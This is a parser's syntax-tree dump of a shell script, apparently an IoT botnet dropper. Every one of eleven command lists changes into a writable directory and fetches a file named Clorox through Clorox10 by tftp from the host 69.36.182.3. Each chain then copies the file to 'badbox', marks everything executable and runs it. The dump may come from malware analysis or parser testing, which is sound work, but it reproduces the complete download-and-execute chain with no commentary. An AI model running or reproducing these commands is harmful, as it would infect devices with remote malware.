CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 172), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 133), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 111), word='-r'),
    WordNode(lineno=4, pos=(112, 118), word='Clorox'),
    WordNode(lineno=4, pos=(119, 121), word='-g'),
    WordNode(lineno=4, pos=(122, 133), word='69.36.182.3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(133, 134)),
  CommandNode(lineno=4, pos=(134, 152), parts=[
    WordNode(lineno=4, pos=(134, 137), word='cat'),
    WordNode(lineno=4, pos=(138, 144), word='Clorox'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(146, 152), word='badbox'), pos=(145, 152), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(152, 153)),
  CommandNode(lineno=4, pos=(153, 163), parts=[
    WordNode(lineno=4, pos=(153, 158), word='chmod'),
    WordNode(lineno=4, pos=(159, 161), word='+x'),
    WordNode(lineno=4, pos=(162, 163), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(163, 164)),
  CommandNode(lineno=4, pos=(164, 172), parts=[
    WordNode(lineno=4, pos=(164, 172), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(173, 298), parts=[
  CommandNode(lineno=5, pos=(173, 180), parts=[
    WordNode(lineno=5, pos=(173, 175), word='cd'),
    WordNode(lineno=5, pos=(176, 180), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(181, 183)),
  CommandNode(lineno=5, pos=(184, 195), parts=[
    WordNode(lineno=5, pos=(184, 186), word='cd'),
    WordNode(lineno=5, pos=(187, 195), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(196, 198)),
  CommandNode(lineno=5, pos=(199, 206), parts=[
    WordNode(lineno=5, pos=(199, 201), word='cd'),
    WordNode(lineno=5, pos=(202, 206), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(207, 209)),
  CommandNode(lineno=5, pos=(210, 218), parts=[
    WordNode(lineno=5, pos=(210, 212), word='cd'),
    WordNode(lineno=5, pos=(213, 218), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(219, 221)),
  CommandNode(lineno=5, pos=(222, 226), parts=[
    WordNode(lineno=5, pos=(222, 224), word='cd'),
    WordNode(lineno=5, pos=(225, 226), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(226, 227)),
  CommandNode(lineno=5, pos=(228, 258), parts=[
    WordNode(lineno=5, pos=(228, 232), word='tftp'),
    WordNode(lineno=5, pos=(233, 235), word='-r'),
    WordNode(lineno=5, pos=(236, 243), word='Clorox1'),
    WordNode(lineno=5, pos=(244, 246), word='-g'),
    WordNode(lineno=5, pos=(247, 258), word='69.36.182.3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(258, 259)),
  CommandNode(lineno=5, pos=(259, 278), parts=[
    WordNode(lineno=5, pos=(259, 262), word='cat'),
    WordNode(lineno=5, pos=(263, 270), word='Clorox1'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(272, 278), word='badbox'), pos=(271, 278), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(278, 279)),
  CommandNode(lineno=5, pos=(279, 289), parts=[
    WordNode(lineno=5, pos=(279, 284), word='chmod'),
    WordNode(lineno=5, pos=(285, 287), word='+x'),
    WordNode(lineno=5, pos=(288, 289), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(289, 290)),
  CommandNode(lineno=5, pos=(290, 298), parts=[
    WordNode(lineno=5, pos=(290, 298), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(299, 424), parts=[
  CommandNode(lineno=6, pos=(299, 306), parts=[
    WordNode(lineno=6, pos=(299, 301), word='cd'),
    WordNode(lineno=6, pos=(302, 306), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(307, 309)),
  CommandNode(lineno=6, pos=(310, 321), parts=[
    WordNode(lineno=6, pos=(310, 312), word='cd'),
    WordNode(lineno=6, pos=(313, 321), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(322, 324)),
  CommandNode(lineno=6, pos=(325, 332), parts=[
    WordNode(lineno=6, pos=(325, 327), word='cd'),
    WordNode(lineno=6, pos=(328, 332), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(333, 335)),
  CommandNode(lineno=6, pos=(336, 344), parts=[
    WordNode(lineno=6, pos=(336, 338), word='cd'),
    WordNode(lineno=6, pos=(339, 344), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(345, 347)),
  CommandNode(lineno=6, pos=(348, 352), parts=[
    WordNode(lineno=6, pos=(348, 350), word='cd'),
    WordNode(lineno=6, pos=(351, 352), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(352, 353)),
  CommandNode(lineno=6, pos=(354, 384), parts=[
    WordNode(lineno=6, pos=(354, 358), word='tftp'),
    WordNode(lineno=6, pos=(359, 361), word='-r'),
    WordNode(lineno=6, pos=(362, 369), word='Clorox2'),
    WordNode(lineno=6, pos=(370, 372), word='-g'),
    WordNode(lineno=6, pos=(373, 384), word='69.36.182.3'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(384, 385)),
  CommandNode(lineno=6, pos=(385, 404), parts=[
    WordNode(lineno=6, pos=(385, 388), word='cat'),
    WordNode(lineno=6, pos=(389, 396), word='Clorox2'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(398, 404), word='badbox'), pos=(397, 404), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(404, 405)),
  CommandNode(lineno=6, pos=(405, 415), parts=[
    WordNode(lineno=6, pos=(405, 410), word='chmod'),
    WordNode(lineno=6, pos=(411, 413), word='+x'),
    WordNode(lineno=6, pos=(414, 415), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(415, 416)),
  CommandNode(lineno=6, pos=(416, 424), parts=[
    WordNode(lineno=6, pos=(416, 424), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(425, 550), parts=[
  CommandNode(lineno=7, pos=(425, 432), parts=[
    WordNode(lineno=7, pos=(425, 427), word='cd'),
    WordNode(lineno=7, pos=(428, 432), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(433, 435)),
  CommandNode(lineno=7, pos=(436, 447), parts=[
    WordNode(lineno=7, pos=(436, 438), word='cd'),
    WordNode(lineno=7, pos=(439, 447), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(448, 450)),
  CommandNode(lineno=7, pos=(451, 458), parts=[
    WordNode(lineno=7, pos=(451, 453), word='cd'),
    WordNode(lineno=7, pos=(454, 458), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(459, 461)),
  CommandNode(lineno=7, pos=(462, 470), parts=[
    WordNode(lineno=7, pos=(462, 464), word='cd'),
    WordNode(lineno=7, pos=(465, 470), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(471, 473)),
  CommandNode(lineno=7, pos=(474, 478), parts=[
    WordNode(lineno=7, pos=(474, 476), word='cd'),
    WordNode(lineno=7, pos=(477, 478), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(478, 479)),
  CommandNode(lineno=7, pos=(480, 510), parts=[
    WordNode(lineno=7, pos=(480, 484), word='tftp'),
    WordNode(lineno=7, pos=(485, 487), word='-r'),
    WordNode(lineno=7, pos=(488, 495), word='Clorox3'),
    WordNode(lineno=7, pos=(496, 498), word='-g'),
    WordNode(lineno=7, pos=(499, 510), word='69.36.182.3'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(510, 511)),
  CommandNode(lineno=7, pos=(511, 530), parts=[
    WordNode(lineno=7, pos=(511, 514), word='cat'),
    WordNode(lineno=7, pos=(515, 522), word='Clorox3'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(524, 530), word='badbox'), pos=(523, 530), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(530, 531)),
  CommandNode(lineno=7, pos=(531, 541), parts=[
    WordNode(lineno=7, pos=(531, 536), word='chmod'),
    WordNode(lineno=7, pos=(537, 539), word='+x'),
    WordNode(lineno=7, pos=(540, 541), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(541, 542)),
  CommandNode(lineno=7, pos=(542, 550), parts=[
    WordNode(lineno=7, pos=(542, 550), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(551, 676), parts=[
  CommandNode(lineno=8, pos=(551, 558), parts=[
    WordNode(lineno=8, pos=(551, 553), word='cd'),
    WordNode(lineno=8, pos=(554, 558), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(559, 561)),
  CommandNode(lineno=8, pos=(562, 573), parts=[
    WordNode(lineno=8, pos=(562, 564), word='cd'),
    WordNode(lineno=8, pos=(565, 573), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(574, 576)),
  CommandNode(lineno=8, pos=(577, 584), parts=[
    WordNode(lineno=8, pos=(577, 579), word='cd'),
    WordNode(lineno=8, pos=(580, 584), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(585, 587)),
  CommandNode(lineno=8, pos=(588, 596), parts=[
    WordNode(lineno=8, pos=(588, 590), word='cd'),
    WordNode(lineno=8, pos=(591, 596), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(597, 599)),
  CommandNode(lineno=8, pos=(600, 604), parts=[
    WordNode(lineno=8, pos=(600, 602), word='cd'),
    WordNode(lineno=8, pos=(603, 604), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(604, 605)),
  CommandNode(lineno=8, pos=(606, 636), parts=[
    WordNode(lineno=8, pos=(606, 610), word='tftp'),
    WordNode(lineno=8, pos=(611, 613), word='-r'),
    WordNode(lineno=8, pos=(614, 621), word='Clorox4'),
    WordNode(lineno=8, pos=(622, 624), word='-g'),
    WordNode(lineno=8, pos=(625, 636), word='69.36.182.3'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(636, 637)),
  CommandNode(lineno=8, pos=(637, 656), parts=[
    WordNode(lineno=8, pos=(637, 640), word='cat'),
    WordNode(lineno=8, pos=(641, 648), word='Clorox4'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(650, 656), word='badbox'), pos=(649, 656), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(656, 657)),
  CommandNode(lineno=8, pos=(657, 667), parts=[
    WordNode(lineno=8, pos=(657, 662), word='chmod'),
    WordNode(lineno=8, pos=(663, 665), word='+x'),
    WordNode(lineno=8, pos=(666, 667), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(667, 668)),
  CommandNode(lineno=8, pos=(668, 676), parts=[
    WordNode(lineno=8, pos=(668, 676), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(677, 802), parts=[
  CommandNode(lineno=9, pos=(677, 684), parts=[
    WordNode(lineno=9, pos=(677, 679), word='cd'),
    WordNode(lineno=9, pos=(680, 684), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(685, 687)),
  CommandNode(lineno=9, pos=(688, 699), parts=[
    WordNode(lineno=9, pos=(688, 690), word='cd'),
    WordNode(lineno=9, pos=(691, 699), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(700, 702)),
  CommandNode(lineno=9, pos=(703, 710), parts=[
    WordNode(lineno=9, pos=(703, 705), word='cd'),
    WordNode(lineno=9, pos=(706, 710), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(711, 713)),
  CommandNode(lineno=9, pos=(714, 722), parts=[
    WordNode(lineno=9, pos=(714, 716), word='cd'),
    WordNode(lineno=9, pos=(717, 722), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(723, 725)),
  CommandNode(lineno=9, pos=(726, 730), parts=[
    WordNode(lineno=9, pos=(726, 728), word='cd'),
    WordNode(lineno=9, pos=(729, 730), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(730, 731)),
  CommandNode(lineno=9, pos=(732, 762), parts=[
    WordNode(lineno=9, pos=(732, 736), word='tftp'),
    WordNode(lineno=9, pos=(737, 739), word='-r'),
    WordNode(lineno=9, pos=(740, 747), word='Clorox5'),
    WordNode(lineno=9, pos=(748, 750), word='-g'),
    WordNode(lineno=9, pos=(751, 762), word='69.36.182.3'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(762, 763)),
  CommandNode(lineno=9, pos=(763, 782), parts=[
    WordNode(lineno=9, pos=(763, 766), word='cat'),
    WordNode(lineno=9, pos=(767, 774), word='Clorox5'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(776, 782), word='badbox'), pos=(775, 782), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(782, 783)),
  CommandNode(lineno=9, pos=(783, 793), parts=[
    WordNode(lineno=9, pos=(783, 788), word='chmod'),
    WordNode(lineno=9, pos=(789, 791), word='+x'),
    WordNode(lineno=9, pos=(792, 793), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(793, 794)),
  CommandNode(lineno=9, pos=(794, 802), parts=[
    WordNode(lineno=9, pos=(794, 802), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(803, 928), parts=[
  CommandNode(lineno=10, pos=(803, 810), parts=[
    WordNode(lineno=10, pos=(803, 805), word='cd'),
    WordNode(lineno=10, pos=(806, 810), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(811, 813)),
  CommandNode(lineno=10, pos=(814, 825), parts=[
    WordNode(lineno=10, pos=(814, 816), word='cd'),
    WordNode(lineno=10, pos=(817, 825), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(826, 828)),
  CommandNode(lineno=10, pos=(829, 836), parts=[
    WordNode(lineno=10, pos=(829, 831), word='cd'),
    WordNode(lineno=10, pos=(832, 836), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(837, 839)),
  CommandNode(lineno=10, pos=(840, 848), parts=[
    WordNode(lineno=10, pos=(840, 842), word='cd'),
    WordNode(lineno=10, pos=(843, 848), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(849, 851)),
  CommandNode(lineno=10, pos=(852, 856), parts=[
    WordNode(lineno=10, pos=(852, 854), word='cd'),
    WordNode(lineno=10, pos=(855, 856), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(856, 857)),
  CommandNode(lineno=10, pos=(858, 888), parts=[
    WordNode(lineno=10, pos=(858, 862), word='tftp'),
    WordNode(lineno=10, pos=(863, 865), word='-r'),
    WordNode(lineno=10, pos=(866, 873), word='Clorox6'),
    WordNode(lineno=10, pos=(874, 876), word='-g'),
    WordNode(lineno=10, pos=(877, 888), word='69.36.182.3'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(888, 889)),
  CommandNode(lineno=10, pos=(889, 908), parts=[
    WordNode(lineno=10, pos=(889, 892), word='cat'),
    WordNode(lineno=10, pos=(893, 900), word='Clorox6'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(902, 908), word='badbox'), pos=(901, 908), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(908, 909)),
  CommandNode(lineno=10, pos=(909, 919), parts=[
    WordNode(lineno=10, pos=(909, 914), word='chmod'),
    WordNode(lineno=10, pos=(915, 917), word='+x'),
    WordNode(lineno=10, pos=(918, 919), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(919, 920)),
  CommandNode(lineno=10, pos=(920, 928), parts=[
    WordNode(lineno=10, pos=(920, 928), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(929, 1054), parts=[
  CommandNode(lineno=11, pos=(929, 936), parts=[
    WordNode(lineno=11, pos=(929, 931), word='cd'),
    WordNode(lineno=11, pos=(932, 936), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(937, 939)),
  CommandNode(lineno=11, pos=(940, 951), parts=[
    WordNode(lineno=11, pos=(940, 942), word='cd'),
    WordNode(lineno=11, pos=(943, 951), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(952, 954)),
  CommandNode(lineno=11, pos=(955, 962), parts=[
    WordNode(lineno=11, pos=(955, 957), word='cd'),
    WordNode(lineno=11, pos=(958, 962), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(963, 965)),
  CommandNode(lineno=11, pos=(966, 974), parts=[
    WordNode(lineno=11, pos=(966, 968), word='cd'),
    WordNode(lineno=11, pos=(969, 974), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(975, 977)),
  CommandNode(lineno=11, pos=(978, 982), parts=[
    WordNode(lineno=11, pos=(978, 980), word='cd'),
    WordNode(lineno=11, pos=(981, 982), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(982, 983)),
  CommandNode(lineno=11, pos=(984, 1014), parts=[
    WordNode(lineno=11, pos=(984, 988), word='tftp'),
    WordNode(lineno=11, pos=(989, 991), word='-r'),
    WordNode(lineno=11, pos=(992, 999), word='Clorox7'),
    WordNode(lineno=11, pos=(1000, 1002), word='-g'),
    WordNode(lineno=11, pos=(1003, 1014), word='69.36.182.3'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1014, 1015)),
  CommandNode(lineno=11, pos=(1015, 1034), parts=[
    WordNode(lineno=11, pos=(1015, 1018), word='cat'),
    WordNode(lineno=11, pos=(1019, 1026), word='Clorox7'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1028, 1034), word='badbox'), pos=(1027, 1034), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1034, 1035)),
  CommandNode(lineno=11, pos=(1035, 1045), parts=[
    WordNode(lineno=11, pos=(1035, 1040), word='chmod'),
    WordNode(lineno=11, pos=(1041, 1043), word='+x'),
    WordNode(lineno=11, pos=(1044, 1045), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1045, 1046)),
  CommandNode(lineno=11, pos=(1046, 1054), parts=[
    WordNode(lineno=11, pos=(1046, 1054), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1055, 1180), parts=[
  CommandNode(lineno=12, pos=(1055, 1062), parts=[
    WordNode(lineno=12, pos=(1055, 1057), word='cd'),
    WordNode(lineno=12, pos=(1058, 1062), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1063, 1065)),
  CommandNode(lineno=12, pos=(1066, 1077), parts=[
    WordNode(lineno=12, pos=(1066, 1068), word='cd'),
    WordNode(lineno=12, pos=(1069, 1077), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1078, 1080)),
  CommandNode(lineno=12, pos=(1081, 1088), parts=[
    WordNode(lineno=12, pos=(1081, 1083), word='cd'),
    WordNode(lineno=12, pos=(1084, 1088), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1089, 1091)),
  CommandNode(lineno=12, pos=(1092, 1100), parts=[
    WordNode(lineno=12, pos=(1092, 1094), word='cd'),
    WordNode(lineno=12, pos=(1095, 1100), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1101, 1103)),
  CommandNode(lineno=12, pos=(1104, 1108), parts=[
    WordNode(lineno=12, pos=(1104, 1106), word='cd'),
    WordNode(lineno=12, pos=(1107, 1108), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1108, 1109)),
  CommandNode(lineno=12, pos=(1110, 1140), parts=[
    WordNode(lineno=12, pos=(1110, 1114), word='tftp'),
    WordNode(lineno=12, pos=(1115, 1117), word='-r'),
    WordNode(lineno=12, pos=(1118, 1125), word='Clorox8'),
    WordNode(lineno=12, pos=(1126, 1128), word='-g'),
    WordNode(lineno=12, pos=(1129, 1140), word='69.36.182.3'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1140, 1141)),
  CommandNode(lineno=12, pos=(1141, 1160), parts=[
    WordNode(lineno=12, pos=(1141, 1144), word='cat'),
    WordNode(lineno=12, pos=(1145, 1152), word='Clorox8'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1154, 1160), word='badbox'), pos=(1153, 1160), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1160, 1161)),
  CommandNode(lineno=12, pos=(1161, 1171), parts=[
    WordNode(lineno=12, pos=(1161, 1166), word='chmod'),
    WordNode(lineno=12, pos=(1167, 1169), word='+x'),
    WordNode(lineno=12, pos=(1170, 1171), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1171, 1172)),
  CommandNode(lineno=12, pos=(1172, 1180), parts=[
    WordNode(lineno=12, pos=(1172, 1180), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1181, 1306), parts=[
  CommandNode(lineno=13, pos=(1181, 1188), parts=[
    WordNode(lineno=13, pos=(1181, 1183), word='cd'),
    WordNode(lineno=13, pos=(1184, 1188), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1189, 1191)),
  CommandNode(lineno=13, pos=(1192, 1203), parts=[
    WordNode(lineno=13, pos=(1192, 1194), word='cd'),
    WordNode(lineno=13, pos=(1195, 1203), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1204, 1206)),
  CommandNode(lineno=13, pos=(1207, 1214), parts=[
    WordNode(lineno=13, pos=(1207, 1209), word='cd'),
    WordNode(lineno=13, pos=(1210, 1214), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1215, 1217)),
  CommandNode(lineno=13, pos=(1218, 1226), parts=[
    WordNode(lineno=13, pos=(1218, 1220), word='cd'),
    WordNode(lineno=13, pos=(1221, 1226), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1227, 1229)),
  CommandNode(lineno=13, pos=(1230, 1234), parts=[
    WordNode(lineno=13, pos=(1230, 1232), word='cd'),
    WordNode(lineno=13, pos=(1233, 1234), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1234, 1235)),
  CommandNode(lineno=13, pos=(1236, 1266), parts=[
    WordNode(lineno=13, pos=(1236, 1240), word='tftp'),
    WordNode(lineno=13, pos=(1241, 1243), word='-r'),
    WordNode(lineno=13, pos=(1244, 1251), word='Clorox9'),
    WordNode(lineno=13, pos=(1252, 1254), word='-g'),
    WordNode(lineno=13, pos=(1255, 1266), word='69.36.182.3'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1266, 1267)),
  CommandNode(lineno=13, pos=(1267, 1286), parts=[
    WordNode(lineno=13, pos=(1267, 1270), word='cat'),
    WordNode(lineno=13, pos=(1271, 1278), word='Clorox9'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1280, 1286), word='badbox'), pos=(1279, 1286), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1286, 1287)),
  CommandNode(lineno=13, pos=(1287, 1297), parts=[
    WordNode(lineno=13, pos=(1287, 1292), word='chmod'),
    WordNode(lineno=13, pos=(1293, 1295), word='+x'),
    WordNode(lineno=13, pos=(1296, 1297), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1297, 1298)),
  CommandNode(lineno=13, pos=(1298, 1306), parts=[
    WordNode(lineno=13, pos=(1298, 1306), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1307, 1434), parts=[
  CommandNode(lineno=14, pos=(1307, 1314), parts=[
    WordNode(lineno=14, pos=(1307, 1309), word='cd'),
    WordNode(lineno=14, pos=(1310, 1314), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1315, 1317)),
  CommandNode(lineno=14, pos=(1318, 1329), parts=[
    WordNode(lineno=14, pos=(1318, 1320), word='cd'),
    WordNode(lineno=14, pos=(1321, 1329), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1330, 1332)),
  CommandNode(lineno=14, pos=(1333, 1340), parts=[
    WordNode(lineno=14, pos=(1333, 1335), word='cd'),
    WordNode(lineno=14, pos=(1336, 1340), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1341, 1343)),
  CommandNode(lineno=14, pos=(1344, 1352), parts=[
    WordNode(lineno=14, pos=(1344, 1346), word='cd'),
    WordNode(lineno=14, pos=(1347, 1352), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1353, 1355)),
  CommandNode(lineno=14, pos=(1356, 1360), parts=[
    WordNode(lineno=14, pos=(1356, 1358), word='cd'),
    WordNode(lineno=14, pos=(1359, 1360), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1360, 1361)),
  CommandNode(lineno=14, pos=(1362, 1393), parts=[
    WordNode(lineno=14, pos=(1362, 1366), word='tftp'),
    WordNode(lineno=14, pos=(1367, 1369), word='-r'),
    WordNode(lineno=14, pos=(1370, 1378), word='Clorox10'),
    WordNode(lineno=14, pos=(1379, 1381), word='-g'),
    WordNode(lineno=14, pos=(1382, 1393), word='69.36.182.3'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1393, 1394)),
  CommandNode(lineno=14, pos=(1394, 1414), parts=[
    WordNode(lineno=14, pos=(1394, 1397), word='cat'),
    WordNode(lineno=14, pos=(1398, 1406), word='Clorox10'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1408, 1414), word='badbox'), pos=(1407, 1414), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1414, 1415)),
  CommandNode(lineno=14, pos=(1415, 1425), parts=[
    WordNode(lineno=14, pos=(1415, 1420), word='chmod'),
    WordNode(lineno=14, pos=(1421, 1423), word='+x'),
    WordNode(lineno=14, pos=(1424, 1425), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1425, 1426)),
  CommandNode(lineno=14, pos=(1426, 1434), parts=[
    WordNode(lineno=14, pos=(1426, 1434), word='./badbox'),
  ]),
])
